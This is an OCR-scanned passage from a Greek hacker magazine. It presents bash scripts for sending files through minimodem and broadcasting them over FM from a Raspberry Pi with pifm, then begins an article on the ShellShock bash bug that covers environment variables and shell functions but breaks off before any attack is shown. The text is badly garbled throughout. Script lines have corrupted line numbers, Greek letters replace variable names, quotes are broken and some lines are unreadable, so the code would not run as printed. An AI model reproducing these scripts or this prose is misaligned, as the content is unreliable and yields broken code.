αρχείου θα πρέπει να εκπἐμπονται τα ακόλουθα τέσσερα τμήματα: 

1. Όνομα αρχείου 

2. Μέγεθος αρχείου 

3. Checksum (CRC32 hash) 

4. Δεδομένα αρχείου (κωδικοποιημένα κατὰ Base64) 
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Where there's a shell, there's a way 


Πα την υλοποίηση όσων περιγράψαμε θα αξιοποιήσουµε το κέλυφος BASH και την 
ενσωματωμένη γλὠσσα για τη συγγραφή scripts. Η υλοποίηση θα μπορούσε να γίνει 
σε οποιοδήποτε ἄλλη γλὠσσα προγραμματισμού, αλλά ο σημαντικότερος παράγο- 
ντας καθυστέρησης στη συγκεκριμένη εφαρμογἠ δεν εἶναι η ταχύτητα εκτέλεσης 
του κὠδικα. Η μεγαλύτερη καθυστέρηση θα εισέρχεται απὀ τη χρήση Tou ἰδιου του 
minimodem. Κάπως ἐτσι αποφασίσαμε να χρησιμοποιήσουμε τη γλὠσσα του BASH, 
η οποία επιτρέπει και την EUKOAN χρήση των εργαλείων της γραμμής εντολών. 


Στη συνέχεια παραθέτουμε τον κὠδικα του script που δημιουργήσαμε για την ano- 
στολἠ των αρχείων. Σημειώστε ὁτι µπορείτε να κατεβάσετε τόσο το συγκεκριµένο 
script, ògo κι αυτά που θα δούµε στη συνέχεια, απὀ το 


http://bit.ly/dhð37minimodemscripts 


To script που ακολουθεί δέχεται δύο παραμέτρους: H πρώτη αφορά στο baud rate 
και η δεύτερη στο ὀνομα του αρχείου που θέλουμε να σταλεἰ: 


61 #! /bin/bash 

02 ΒΝΑΜΕΞ basename $2` 

03 echo "Sending file $BNAME" 

04 echo "ΦΒΝΑΜΕ" | minimodem --tx $1 

@5 sleep 2s 

@6 base64 $2 > temp.b64 

@7 TX_CRC=cksum temp.b64 | cut -d " " -f1> 

@8 echo "With CRC checksum: $TX_CRC" 

@9 echo "$TX_CRC" | minimodem --tx $1 

10 sleep 25 

11 TX_LEN=`wc -c < temp.b64” 

12 echo "Encoded file, size: $TX_LEN bytes to transmit" 
δι Heke Tae = σε EENE ale) ESIE 

14 echo "It may take about $TIME seconds. Please wait... 
15 echo "$TX_LEN" | minimodem --tx $1 

16 sleep 2s 

17 echo "Please wait..." 

18 cat temp.b64 | minimodem --tx $1 

19 rm temp.b64 


Κατά Ta γνωστά, στην πρώτη γραμμὴ δηλώνουμε το ὀνομα του διερμηνέα για 
τον κὠδικα που ακολουθεἰ - το κέλυφος BASH. Στη συνέχεια, µε τη βοήθεια του 
basename αποκόπτουµε απὸ την πλήρη διαδρομὴ το ὀνομα του αρχείου που θέλου- 
µε να στείλουμε και το οποίο έχουμε δώσει ως δεύτερη παράμετρο (μεταβλητἠ $2). 
Το ὀνομα του αρχείου τοποθετεἰται στην παράμετρο ΦΒΝΑΜΕ και το εμφανίζουμε 
στο χρήστη (γραµµή 03) μόνο και μόνο για την πληροφὀρησή του. Ακολουθώντας 
το NPWTOKOAAO µας χρησιμοποιούμε το χαρακτήρα της διασωλήνωσης και στἐλνου- 
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µε στον παραλήπτη το ὀνομα του αρχείου. Το baudrate της αποστολἠς εἰναι η τιµή 
που δώσαμε σαν πρώτη παράμετρο κατὰ την κλήση του script (μεταβλητή $1). Στη 
συνέχεια εισάγουµε µια παύση ενὸς δευτερολέπτου, αφήνοντας ETO! ἑνα µικρὀ Xpo- 
νικὀ περιθώριο στον αποδέκτη, μετὰ τη λήψη του πρώτου μηνύματος. Σειρά τώρα 
έχει η κωδικοποίηση του αρχείου κατά Base64, η οποία συντελείται στη γραμμή 
06. Το κωδικοποιημένο περιεχόµενο του προς αποστολἠ αρχείου τοποθετείται στο 
προσωρινὸ αρχείο temp.b64. Συνεχίζουμε υπολογίζοντας το CRC32 checksum του 
κωδικοποιημένου αρχεἰου,το οποίο και αποθηκεύουµε στη μεταβλητή $TX_CRC. Πα 
το σκοπὸ αυτὸ χρησιμοποιούμε το εργαλείο cksum σε συνδυασμὀ µε TO Cut, ἐτσι 
ώστε να αποσπάσουµε μόνο την τιµή του checksum. Αυτό που ζητάμε ano το cut 
εἶναι να διασπάσει τη συμβολοσειρά µας σε επιµέρους τμήματα οπουδήποτε συναντά 
KEVO, και να µας επιστρέψει το πρώτο τμήμα (εκεἰ τυπώνεται το checksum ano το 
cksum). Ακολούθως αποστέλλουµε το checksum µε το γνωστὸ τρὀπο στον napa- 
λήπτη του αρχείου. Στη γραμμή 11 εκτελούμε µια καταμέτρηση των χαρακτήρων 
του προσωρινού αρχείου µε TO κωδικοποιημένο μήνυμα, WOTE να μάθουμε τον ὀγκο 
των προς μετάδοση δεδομένων και να υπολογίσουμε το χρόνο που απαιτείται για 
την ολοκλήρωση της μετάδοσης. Πα auth την εργασία χρησιμοποιούμε To εργαλείο 
καταμέτρησης λέξεων WC µε την παράμετρο -ς, η οποία επιβάλλει την καταμέτρηση 
των επιµέρους χαρακτήρων ενὸς αρχείου. H τιµή αυτἠ αποθηκεύεται στη μεταβλητή 
ΦΤΧ ΓΕΝ. Στη συνέχεια εμφανίζουμε το εν λόγω μέγεθος (γραμμὴ 12) και προχωρά- 
µε σε µια εκτίμηση του χρόνου αποστολἠς, στηριζόμενοι στην τιµή του baud rate. 
O υπολογισμός γίνεται µε τη βοήθεια του let (γραμμή 13) και το αποτέλεσµα αποθη- 
κεύεται στη μεταβλητή ΦΤΙΜΕ, την οποία χρησιμοποιούμε αμέσως μετά (γραμμὴ 14). 
Στη συνέχεια, στη γραμμὴ 15, στέλνουμε το πλήθος των προς αποστολἠ δεδομένων 
στον παραλήπτη κι αφού ζητήσουμε ευγενικἀ απὀ το χρήστη να περιμένει (γραμμή 
17), εκτελούµε την αποστολἠ των κωδικοποιηµένων δεδοµένων (στἐλνουµε το ap- 
χεἰο temp.b64 µε τη βοήθεια του cat). Τέλος, όταν ολοκληρωθεί η αποστολἠ προχω- 
ράμε στη διαγραφἡ του προσωρινού αρχείου (temp.b64). 


crunchbang@crunchbang; ~ 
$ minimo 


ΟΙ συμβολοσειρἑς που 
παράγουν τα προγράἀμ- 
ματα στο Raspberry Pi, 
εμφανίζονται στην οθόνη 
του υπολογιστή µας. Το 
στιγμιότυπο εἶναι ano 

τη φάση των δοκιμών, 
για τη διασύνδεση του 
minimodem µε To pifm. 
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Πριν προχωρήσουμε, πρέπει να σημειώσουμε οτι η εκτέλεση του παραπάνω script 
πρέπει να ἑπεται της εκτέλεσης του αντίστοιχου script στον παραλήπτη. Ποιο εἶναι 
όμως αυτό το script που πρέπει να τρἐχει στον παραλήπτη; Ας εξετάσουμε τον KW- 
δικά του: 

61 #! /bin/bash 

@2 FILENAME= minimodem --rx --rx-one -q $1° 

@3 echo "Receiving file: ΦΕΤΙΕΝΑΜΕ" 

@4 TX_CRC= minimodem --rx --rx-one -q $1° 

@5 echo "With CRC checksum: $TX_CRC" 

@6 RX_LEN= minimodem --rx --rx-one -q $1° 

@7 echo "Encoded file, size: $RX_LEN bytes to receive." 

@8 let "TIME = $RX_LEN * 10 / $1" 

@9 echo "It may take about $TIME seconds. Please wait... 

10 minimodem --rx --rx-one -q $1 > temp.b64 

11 RX_CRC="cksum temp.b64 | cut -d " " -f1 

12 echo "Received CRC checksum $RX_CRC" 

13 if [ "$TX_CRC" == "$RX_CRC" ] ; then 

14 base64 -d temp.b64 > "ΦΕΤΙΕΝΑΜΕ" 

15 echo "Transmission ended successfully!" 

16 else 

17 echo "CRC checksum not match, transmission failed!" 

18 fi 

19 rm temp.b64 


To script της λήψης του αρχείου, αυτό που πρέπει va τρέξουµε στον υπολογιστή-πα- 
ραλήπτη, δέχεται μόνο µια παράμετρο: Την τιµή του baud rate. Ακολουθώντας πάλι 
τις διαδικασίες που προβλέπει το πρωτὀκολλὀ µας, το script ξεκινὰ αναμένοντας 
την αποστολἠ του ονόματος του αρχείου. Το ὀνομα αποθηκεύεται στη μεταβλητή 
$FILENAME (γραµµή 02). Εδώ αξίζει να παρατηρήσετετις επιπλέον παραμέτρους που 
έχουμε χρησιμοποιήσει κατὰ την κλήση του minimodem: Τις --rx-one και -α. Με την 
πρώτη εκ των δύο διακόπτεται η εκτἐλεση του προγράμματος αμέσως μετὰ τη λήξη 
της μετάδοσης, ενώ µε τη δεύτερη η ἐξοδος του προγράµµατος θα εἰναι απαλλαγμέ- 
νη ano οποιοδήποτε ἄχρηστο μήνυμα (τις πληροφορἰες μετάδοσης). Μόλις ληφθεί το 
ὀνομα του αρχείου αναμένεται η λήψη του CRC checksum, το οποίο κι αποθηκεύεται 
στη µεταβλητή $RX_CRC (γραμμή 04). Στη συνέχεια αναμένεται το μέγεθος του 
αρχείου. Όπως και στο script αποστολἠς, ETO! κι εδὠ υπολογίζεται ο εκτιµώμενος 
χρόνος για τη μετάδοση του αρχείου και, φυσικά, εμφανίζεται στο χρήστη (γραμμὲς 
07-09). Έχοντας φτάσει στο τελευταίο βήμα της διαδικασίας αναμένεται η λήψη των 
κωδικοποιηµένων δεδοµένων του αρχείου (γραμμή 10) τα οποία, σε αντίθεση µε 
τις προηγούμενες λήψεις, δεν αποθηκεύονται σε κάποια μεταβλητή αλλά απευθεἰας 
στο δίσκο (συγκεκριµένα, στο αρχείο µε ὀνομα temp.b64). Μόλις ολοκληρωθεἰ η 
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crunchbang@crunchbang; ~/downloads 
crunchbang@crunchbang:~/downloads$ ./receive.sh 700 
Receiving file: gnu-fdl.png 
With ΜΌ5 checksum: £2b2350369ce16ecc118729d0a45323d 
Encoded file, size: 28 bytes to receive. 
It may take about seconds. Please wait... 
Received MD5 checksum £2b2350369ce16ecc118729d0a45323d 

i nded succesfully! 

icrunchbang:~/downloads$ g 


pi@raspberry: ~/Jadmin/pifm 
aspberry 
ing file g 


Το τροποποιημένο script 
αποστολής καταφέρνει να 
στείλει αρχεία µε αξιόπιστο 
κι αυτοματοποιημένο τρόπο, 
ano To Raspberry στον 
υπολογιστή! Η µεταφορά 
πραγματοποιείται ασύρματα, 
µέσω της μπάντας των ΕΜ 
και µε ταχύτητα που αγγίζει 
τα 700 bps :D 


λήψη των δεδομένων υπολογίζουμε το checksum του προσωρινού αρχείου (γραμμή 
11) και το εμφανίζουμε στο χρήστη. Ακολούθως συγκρίνουμε αυτὀ το Checksum µε 
εκεἰνο που λάβαμε στο προηγούμενο βήμα. Αν οι δύο τιμὲς ταυτίζονται, μπορούμε να 
εἰμαστε βέἐβαιοι ότι η μετάδοση των δεδομένων πραγματοποιήθηκε επιτυχώς. Έτσι, 
προχωράμε στην αποκωδικοποίηση του προσωρινού αρχείου κι αποθηκεύουµε το 
παράγωγο αρχείο µε το ὀνομα που ἐστειλε ο αποστολέας κι αποδόθηκε στη µεταβλη- 
τὴ $FILENAME (γραμμή 14). Αν τα δύο checksums δεν ταυτίζονται, εµφανἰζουμε Eva 
μήνυμα αποτυχίας (γραµµή 17). Σε κάθε περίπτωση, στο τέλος του προγράµµατος 
διαγράφεται το προσωρινό αρχείο (temp.b64). 


Δεν ξέρουμε αν το καταλάβατε, αλλά µε Ta δύο μικρὰ προγραμματάκια που εἰδαμε 
καταφέραμε να στἠσουµε ¿vav σχετικά αυτοματοποιημἑνο και παράλληλα αξιόπιστο 
τρόπο μεταφοράς αρχείων, µε τη βοήθεια του minimodem. 


Κούλα, μ' ακούς; 


Μπορεἰ το minimodem ν' αποτελεί το νέο µας φίλο αλλά ἐχουμε κι Evav παλιὀ, που 
δεν ξεχνάμε κι οὐτε θέλουμε να αποχωριζόµαστε. Τι, δεν καταλάβατε για ποιον pl- 
λάμε; Μα για To Raspberry Pi, φυσικὰ! Οι τακτικοί αναγνώστες του περιοδικού θα 
θυμούνται σίγουρα το άρθρο σχετικἀ µε το ΡΙΕΜ (βλ. deltaHacker 029), ὁπου κάναμε 
μια μικρή επἰδειξη των μουσικών δυνατοτήτων του Raspberry Pi. Συγκεκριµένα, µε 
τη βοήθεια του προγράμματος pifm μετατρέψαμε To Raspberry Pi σε ἑναν μικρὸ no- 
Und της μπάντας των FM και για την εμβέλεια του οικιακού µας χώρου. Να θυμίσουμε 
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ότι TO npòypappa pifm αξιοποιεἰ τους ακροδέκτες GPIO του Raspberry, επάνω σε 
ἑναν ano τους οποίους δημιουργεἰ παλμούς ραδιοκυμάτων ΕΜ. Ἔτσι, το μόνο που 
έχουμε να κάνουμε εμείς εἶναι να συνδέἐσουµε στο συγκεκριμένο ακροδέκτη µια pl- 
κρἠ κεραία (Eva χάλκινο καλώδιο μήκους 5-10 εκατοστὠν). 


Με το συνδυασμό των δυνάμεων των pifm και minimodem, σκεφτήκαμε οτι θα ἦταν 
δυνατὸ να μεταφέρουμε αρχεἰα ασύρματα και χωρίς να προκαλούμε πονοκἐφαλο 
στους παρευρισκόμενους. H μετάδοση θα πραγματοποιείται αθὀρυβα, ασύρματα και 
χωρίς την ανάγκη ο υπολογιστής και To Raspberry Pi να βρίσκονται κοντά ἡ στο ἰδιο 
δωμάτιο! Φυσικά, ο υπολογιστἠς που θα λαμβάνει τις εκπομπὲς του Raspberry θα 
χρειαστεἰ µια µικρή αναβάθµιση για τη λήψη ραδιοκυμάτων, αλλά αυτό θα το αντι- 
µετωπίσουμε αργότερα µε µια ἄκρως οικονομική λύση ;) 


Προφανώς, το πρὠτο βήμα εἶναι να εγκαταστήσουµε το pifm στο Raspberry Pi. 
Μετά, όμως, θα χρειαστεί να τροποποιήσουµε ελαφρώς το script που πραγµατοποιεἰ 
την αποστολἠ. Ακολουθεἰ το ανανεωμένο Script αποστολἠς: 


61 #! /bin/bash 

02 BNAME= basename $2` 

03 echo "Sending file $BNAME" 

@4 echo "$BNAME" | minimodem --tx -f temp.wav $1 

@5 sudo ./pifm temp.wav 87.5 48000 > /dev/null 2>&1 
θ6 sleep 1s 

07 base64 $2 > temp.b64 

68 TX_CRC=`cksum temp.b64 | cut -d " " -F1 

69 echo "With CRC checksum: $TX_CRC" 

10 echo "$TX_CRC" | minimodem --tx -f temp.wav $1 
11 sudo ./pifm temp.wav 87.5 48000 > /dev/null 2>&1 
12 sleep 1s 

13 ΤΧ ΙΕΝΞ we -c < temp.b64` 

14 echo "Encoded file, size: $TX_LEN bytes to transmit" 
15 echo "$TX_LEN" | minimodem --tx -f temp.wav $1 
16 sudo ./pifm temp.wav 87.5 48000 > /dev/null 2>&1 
17 sleep 1s 

Πα ee “ΠΠΠΞ = E [ΗΝ © ale) 77 ὑπ} 

19 echo "It may take about $TIME seconds. Please wait..." 
20 cat temp.b64 | minimodem --tx -f temp.wav $1 

21 sudo ./pifm temp.wav 87.5 48000 > /dev/null 2>&1 
22 rm temp.b64 


Οι γραμμὲς που xouv τροποποιηθεἰ ἡ προστεθεἰ επισηµαἰνονται µε ἕἑντονη γραφή. 
Ουσιαστικἀ, το μόνο που έχουμε κάνει εἶναι ν' αλλάξουμε τον τρὀπο εκτέλεσης 
του minimodem και να επιστρατεύσουμε το pifm. H αλλαγή στην εκτέλεση του 
minimodem ἐγκειται στη χρήση της παραμέτρου -f. Έτσι, οι ἦχοι που αναπαριστούν 
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κάθε φορά τα προς μετάδοση δεδομένα δεν αναπαράγονται, αλλά αποθηκεύονται σε 
ἑνα αρχείο WAV. Στη συνέἐχεια τροφοδοτούμε το εν λὀγω αρχείο στο pifm. Βέβαια, 
σε αυτό το σημείο υπάρχουν αρκετὲς λεπτομέρειες που αξίζουν την προσοχἠ µας. 
Κατ' αρχάς, στον κὠδικά µας θα Seite OT! ζητάμε η εκποµπἠ να πραγµατοποιηθεί στη 
συχνότητα των 87.5kHz. Αυτή τη συχνότητα την επιλἐξαµε επειδἠ στη δικἠ µας πε- 
ριοχἠ ἐμοιαζε να µην καταλαμβάνεται ano κανένα ραδιοφωνικὀ σταθµὀ. Επομένως, 
υποθέσαµε ὁτι η εκποµπἠ µας θα δέχεται τις λιγότερες παρεμβολές. Εσεἰς µπορείτε 
να δοκιμάσετε µε την ἴδια συχνότητα ἡ να βρείτε κἄποια καταλληλότερη για την 
περιοχἠ σας: Πάρτε Eva ραδιοφωνἀκι, εντοπίσετε τη συχνότητα που παρουσιάζει 
τον πιο "καθαρό" θόρυβο και χρησιμοποιήσετε αυτἠν:. Κατὰ την εκτέλεση του pifm 
έχουμε ορίσει και τη συχνότητα δειγματοληψίας µε την οποία κατασκευάστηκε TO 
αρχείο WAV. Τα 48000ΗΖ εἶναι συχνότητα που χρησιμοποιεί το minimodem εξ ορι- 
σμού. Τέλος, µε τη βοήθεια της ανακατεύθυνσης εξασφαλίζουµε OT! το pifm δεν θα 
εμφανίσει κανένα μήνυμα στο χρήστη (οδηγούνται όλα στο /dev/null). 


Στην ἄλλη πλευρά, αυτή του υπολογιστή που θα κάνει τη λήψη, δεν χρειάζεται να 
τροποποιήσουµε καθόλου τον κὠδικα. Ωστόσο, θα χρειαστούµε va μέσο για τη 
λήψη των ραδιοκυμάτων. Μια εξαιρετικἠ λύση, η οποία μάλιστα θα επέτρεπε και 
την εκπομπή ραδιοκυμάτων εκτός ano τη λήψη, εἶναι η χρήση ενὸς SDR. Δυστυχώς 
όμως πρὀκειται για ακριβὲς συσκευὲς και, το σημαντικότερο, εἶναι απίθανο να βρού- 
µε κάποια παραπεταμένη στο συρτάρι µας. Αντίθετα, εἶναι πολύ πιθανὀ να βρούμε 
Eva ραδιοφωνάκι µε ἐξοδο ἠχου για ακουστικά. Σ' αυτή την περίπτωση αρκεἰ να ouv- 
δέσουµε την ἐξοδο του ραδιοφώνου στο line-in του υπολογιστή. Αν το ραδιόφωνο 
δεν παρέχει ἐξοδο για ακουστικἀ, αρκεἰ να το τοποθετήσουµε κοντὰ στο µικρὀφωνο 
του υπολογιστή ;) 


Πα τη μεταφορά αρχείων ano To Raspberry Pi στον υπολογιστή, αρκεἰ να ακολου- 
θήσουμε τα εξἠς βήματα: Ρυθµἰζουμε το ραδιοφωνάκι στη συχνότητα εκπομπής 
του pifm και εκτελούμε στον υπολογιστή το script λήψης. Ακολούθως EKTEAOUHE 
το script αποστολἠς στο Raspberry Pi. Αυτό ἦταν ὁλο! Μετά, σαν μικρὰ παιδιὰ που 
εἰμαστε, μπορούμε να απολαύσουμε τη μαγεία που συντελείται... 


Πέρα ano την πλάκα, αν αναρωτιέἑστε για την αξιοπιστία και την ταχύτητα της ETÀ- 
δοσης, πρέπει να σας πούμε OT! δεν αντιµετωπίσαμµε κανένα πρὀβλημα σε ταχύτητες 
ano 500 ¿wç 600 bps. Παραδόξως, συναντήσαμε αρκετἀ σφάλματα σε χαμηλότερα 
baud rates. Πιστεύουμε ότι αυτό οφεἰλεται στο θόρυβο υποβάθρου που συλλαμβά- 
νει το ραδιοφωνάκι µας. Νομίζουμε ὁμως ὁτι κανένας δεν θα ἠθελε χαμηλούς puð- 
μούς μετάδοσης, δε συμφωνείτε; 


Επικοινωνεῖτε, εἶναι ευλογία! 


Μετὰ ano ὁσα προηγἠθηκαν εἶναι αναμενόμενο να αισθανόμαστε αρκετά ικανοποι- 
ημένοι! Όμως οι εφαρμογὲς του minimodem δεν σταματούν στη μεταφορὰ αρχεἰ- 
ων. Φανταστείτε Eva δίκτυο ano Raspberry Pi και υπολογιστὲς που ανταλλάσσουν 
δεδομένα κι ενδεχομένως τις μετρήσεις διαφόρων αισθητήρων µε την TEXVIKN που 
παρουσιάσαμε! Ελπίζουμε τώρα να κινήσαμε ακόµα περισσότερο το ενδιαφέρον σας. 
Αυτὸ που θα θέλαμε, όμως, εἶναι να μάθουμε για τις δικές σας υλοποιήσεις. Kaàñ 
διασκέδαση και καλὲς ακροάσεις ;) 


2. Παρεμπιπτόντως, μετὰ and αυτἠ την αναζήτηση µην ξανακρύψετε το ραδιοφωνάκι γιατί θα µας χρειαστεί πολύ σύντομα ;) 
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Skill: Intermediate 


Tags: ShellShock, BASH, environment variables, parsing 


by Spir@l Evoluti@n 


#!/bin/bash/ shock 


ShellShock: Νευρικὴή διαταραχἠ 


Ξεχάστε αυτά που λέγαμε περί της επικινδυνότητας του Heartbleed bug, ὅτι 
µε ευκολία θα μπορούσε να μεταφέρει σενάρια του κινηματογράφου στην 


πραγματική ζωή κ.λπ. Παίρνουμε πίσω αυτὀ που γράψαμε στο σχετικὀ άρθρο του 
τεύχους 031. Τελικά οι ταινίες µε hackers, που μπαινοβγαΐνουν σε servers για 
πλάκα, ἐγιναν ρεαλιστικότερες µε την αποκάλυψη του ShellShock! 


ShellShock: Νευρική διαταραχή 


Αα 


Όταν στο deltaHacker 031 συζητούσαμε για το Heartbleed και κάναμε λόγο για Eva 
bug µε τρομακτικὲς συνέπειες, δεν παἰζαμε κἀποιο δηµοσιογραφικὀ παιχνίδι. Ἐφται- 
γε βλέπετε η τεράστια -σχεδὸν αφελἠς- εμπιστοσύνη που τρέφαμµε για το AVOIKTO 
Λογισμικό, στο χώρο του οποίου επικρατεἰ TO (παραφρασμἐνο) δόγμα "πολλοί βλὲ- 
πουν τον κὠδικα, apa τα bugs δεν επιβιώνουν". (Σ.τ.Ε. Το πολύ για καμιά δεκαριά 
χρονάκια.) Την ἴδια στιγµή, αδυνατούσαμε να θυμηθούμε κάποια ἄλλη αδυναμία που 
να ἐχει διαβρώσει τόσο πολύ τα θεμέλια των κρυπτογραφημένων συνδέσεων. Ὅμως 
η αντἰληψἠ µας για το τι εστἰ πραγματικἁ επικἰνδυνο bug άλλαξε ἄρδην, όταν kave 
την εμφάνισἠ του To ShellShock. H αδυναμία που εντοπίστηκε στον κὠδικα του KE- 
λύφους BASH υποβάθμισε το Heartbleed στην κατηγορία "Ανησυχητικὀ Πρόβλημα". 
Πράγματι, αν και το Heartbleed ενέπνευσε Πολλά σενάρια συνωμοσίας, δεν εἶναι 
βέβαιο OT! αξιοποιήθηκε ποτὲ σε πραγματικὲς συνθήκες. Πολὺ επιγραμματικά, va 
θυμίσουμε ὁτι το Heartbleed επέτρεπε στους κακὀβουλους χρήστες να προκαλούν 
buffer overflow σε υπηρεσίἰες που βασίζονται στο πρωτόκολλο TLS, και μ' αυτὸν τον 
τρόπο να διαβάζουν περιοχὲς της μνήμης του server όπου ἴσως βρίσκονταν αποθη- 
κευμένα τα κλειδιὰ κρυπτογράφησης. Κάτι τέτοιο εἶναι λογικό va προκαλεὶ τεράστια 
ανησυχία, αλλά αν κάνουμε τη σύγκριση µε το ShellShock θα διαπιστώσουμε OTI, TE- 
Alka, τα πράγματα δεν ἦταν και τόσο τραγικἀ. Ano τη μία, µετά απὀ πολλὲς δοκιμὲς 
και µε αρκετή τύχη, το Heartbleed ἑδινε µια πιθανότητα στον επιτιθἐµενο να βρει τα 
κλειδιά κρυπτογράφησης. Από την άλλη ὁμως το ShellShock μπορούσε να αξιοποιη- 
θεἰ ταχύτατα και µε µεγάλη ευκολία, EVW αν το μηχάνημα-στὀχος ἦταν ευπαθὲς τότε 
η επιτυχία της επίθεσης ἦταν εξασφαλισμένη. 


Εντάξει, ακουγόµαστε απόλυτοι και το βεβαρυμένο µας παρελθὀν μπορεί τώρα va 
σας βάζει σε σκέψεις: Μήπως τρομάξανε τούτοι 'δώ και τα παραλένε; H απἀντησή 
μας εἶναι αρνητικἠ και σκοπεύουµε να σας αποδεἰξουµε γιατὶ δεν υπερβάλλουμε. Θα 
ξεκινήσουμε µε μερικὲς γενικὲς EVVOIEG κι ορισμένες λειτουργίες του BASH, η εξοι- 
KEIWON µε τις οποίες αποτελεἰ προὐπόθεση για την κατανόηση του ShellShock. Στη 
συνέχεια θα περιγράψουμε την αδυναμία που εντοπίστηκε και μερικὲς επιθέσεις που 
την εκμεταλλεύονται, WOTE να φανεί η επικινδυνότητα του Shellshock. 


Ἐπ. pvar@crunchbang: ~ -5x 
pvarêcrunchbang:~$ 


pvar€crunchbang:~$ 


pvar@écrunchbang:~$ 


pvarécrunchbang:~$ fecho; echo $new_var; echo 


this is a string! 


pvar€crunchbang:~$ 
ipvar@crunchbang:~$ 


pvarécrunchbang:~$}bash -c ‘echo; echo $new_var; echo' 


pvar@crunchbang:~$ 


H petaBAntn new_var υφίσταται στο στιγμιότυπο του κέλυφος ὁὀπου την ορίσαµε, 
αλλά όταν εκτελούμε µια νέα διεργασία Tou BASH και ζητάμε την EKTUNWON της δεν 
παίρνουμε τίποτα. AUTO εἶναι αναμενόμενο, εφόσον δεν πρὀκειται για µεταβλητή περι- 
βάλλοντος και δεν κληρονομείται ano το περιβάλλον των νέων διεργασιών. 
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Περιβάλλον εκτέλεσης 


Υπάρχει κανένας χρήστης του Linux που να µην ἐχει ακούσει για τις μεταβλητὲς 
περιβάλλοντος ἡ αλλιώς environment variables!; Πρόκειται για μεταβλητές που δι- 
ατηρούν βασικὲς ρυθμίσεις για τη συμπεριφορά του κελύφους (shell) ἡ και ἄλλων 
προγραμμάτων, καθώς και κάποια γενικότερα στοιχεία ὁπως το ὀνομα του χρήστη, 
τη θέση του home directory, τους καταλόγους ὁπου βρίσκονται τα προγράμματα και 
τα σκριπτάκια µας (το λεγόμενο path) κ.ά. Κάτι που πρέπει να έχουμε υπόψη εἶναι 
ότι αυτὲς οι μεταβλητὲς δεν εἶναι καθολικὲς - δεν εἶναι προσβάσιµες ano οποιαδἠπο- 
τε διεργασία εκτελείται στο σύστημαξ. Οι μεταβλητὲς περιβάλλοντος ισχύουν µόνο 
μέσα στο περιβάλλον ὀπου xouv οριστεί. Όπως υποψιάζεστε, σ' Eva σύστημα Linux 
μπορούμε να ἐχουμε πολλά διαφορετικά περιβάλλοντα. Τι εἶναι ὁμως GUTO το περι- 
βάλλον στο οποίο αναφερόμαστε κάθε λίγο; Κατ' αρχάς, το πλήρες του ὀνομα εἶναι 
"περιβάλλον εκτέλεσης" κι αποτελεἰ µια περιοχἠ μνήμης που δεσμεύεται για κάθε 
διεργασία. Κάθε φορά που εκτελούμε Eva πρὀγραμμα δημιουργεῖται Eva vo nepi- 
βάλλον. Αυτό το νέο περιβάλλον κληρονομεἰ τα περιεχόμενα του περιβάλλοντος and 
το οποίο πραγματοποιήθηκε η εκτέλεση. Επομένως, OTAV τρέχουμε ἑνα πρὀγραμμα 
ano το κἐλυφος BASH, δημιουργείται Eva περιβάλλον που περιέχει τις ὀποιες µετα- 
βλητὲς περιβάλλοντος εἰχαμε ορἰσει στο περιβάλλον του BASH. 


pvaré@crunchbang:~$ E 
pvar@crunchbang:~$ 


pvar@crunchbang:~$ 


pvaré@crunchbang:~$ bash -c ‘echo; echo $new_var; echo' 


ἘΠ18 is a string! 


pvar€crunchbang:~$ 


Με τη βοήθεια της εντολής export μπορούμε να "μετατρέψουμε"” τη μεταβλητή µας σε 
µια μεταβλητή περιβάλλοντος. Πλέον, όταν εκτελούμε µια νέα διεργασία του BASH και 
ζητάμε την εκτύπωση της τιμής της, λαμβάνουμε το αναμενόμενο String. 


Μεταβλητὲς και συναρτήσεις 


Ας εστιάσουµε τώρα στο κἐλυφος BASH και θα επανέλθουµε στο περιβάλλον σύντο- 
μα. Όπως γνωρἰζουμε, TO BASH ενσωματώνει την υποδομή για τη συγγραφἠ και την 
εκτέλεση προγραμμάτων ἡ ακριβέστερα σεναρίων (scripts). AUTO, μεταξὺ ἄλλων, 
συνεπάγεται δύο πράγματα: O χρήστης μπορεἰ να ορίζει μεταβλητές και συναρτή- 
σεις. Πα να ορίσουμε µια μεταβλητή, αρκεἰ να γράψουμε το ὀνομά της και HE TN Boñ- 
θεια του χαρακτήρα της ισότητας (=) να δώσουμε την επιθυμητή τιμή”. Στη συνέχεια 
μπορούμε να χρησιμοποιήσουμε τη μεταβλητή κανονικἀ, μόνο που για τη διάκριση 
του ονόματὀς της απὀ οποιοδήποτε ἆλλο string, πρέπει να βάλουμε το χαρακτήρα 
του δολαρίου ($) στ' αριστερά της: 


1. Μεταβλητὲς περιβάλλοντος υπάρχουν και στα Windows, αλλά παρουσιάζουν διαφορετική συμπεριφορά και δεν υπάρχει λόγος να µπλέξουµε 
τώρα. 

2. Στα Widnows *eivai* καθολικὲς και υπάρχει μόνο Eva στιγμιὀτυπὀ τους, προσβάσιμο and όλα τα προγράµµατα. Τρέχα γύρευε... 

3. Χωρίς κενὰ γύρω and το ἰσον! 
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$ my_string='...this is just a string variable! ' 
$ my_number=42 

$ 

$ echo $my_string 

...this is just a string variable! 

$ 

$ echo 'my number is '$my_number 

my number is 42 


$ 


Εξίσου εὐκολα μπορούμε να ορίσουμε και συναρτήσεις: Αρκεὶ να γράψουμε το επι- 
θυμητὀ ὀνομα, να τοποθετήσουµε αμέσως μετὰ Eva ζεύγος παρενθἐσεων και στη 
συνέχεια να παραθέσουµε τον κὠδικα της συνάρτησης μέσα σε ἀγκιστρα. Μετά τον 
ορισμὀ µιας συνάρτησης, μπορούμε να την καλέσουµε δίνοντας το ὀνομὰ της: 


$ my_function(){ echo ‘this is printed from a function!'; } 
$ 
$ my_function 


this is printed from a function! 


$ 
icons pvar@crunchbang: ~ -0x 
|pvar@crunchbang:~$ 
ipvar€crunchbang:~$ 
ipvar@crunchbang:~$ 
hello world! 
pvar@crunchbang:~$ 
pvar@crunchbang:~$ 
pvar@crunchbang: 5 | SRE 
bash: new_func: commana not round 
pvar@€crunchbang:~$ 


Αυτό που διαπιστώσαμε για τις μεταβλητὲς του BASH, ισχύει 
και για τις συναρτήσεις. Η ισχύς της τους (TO scope) περιορἰζε- 
ται στο στιγμιότυπο του κελύφους ὀπου τις ορἰσαμε. 
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Ano το κέλυφος στο περιβάλλον 


Οι μεταβλητές που αναφέραμε προηγουμένως -αυτὲς που ορἰζουμε στο κἐλυφος 
BASH- δεν αποτελούν μεταβλητὲς περιβάλλοντος. Οι συγκεκριμένες μεταβλητές, 
λοιπόν, δεν κληροδοτούνται στο περιβάλλον εκτέλεσης των νέων διεργασιών. Αυτός 
ο διαχωρισμός μεταξὺ των δικών µας μεταβλητών και των μεταβλητών περιβάλλο- 
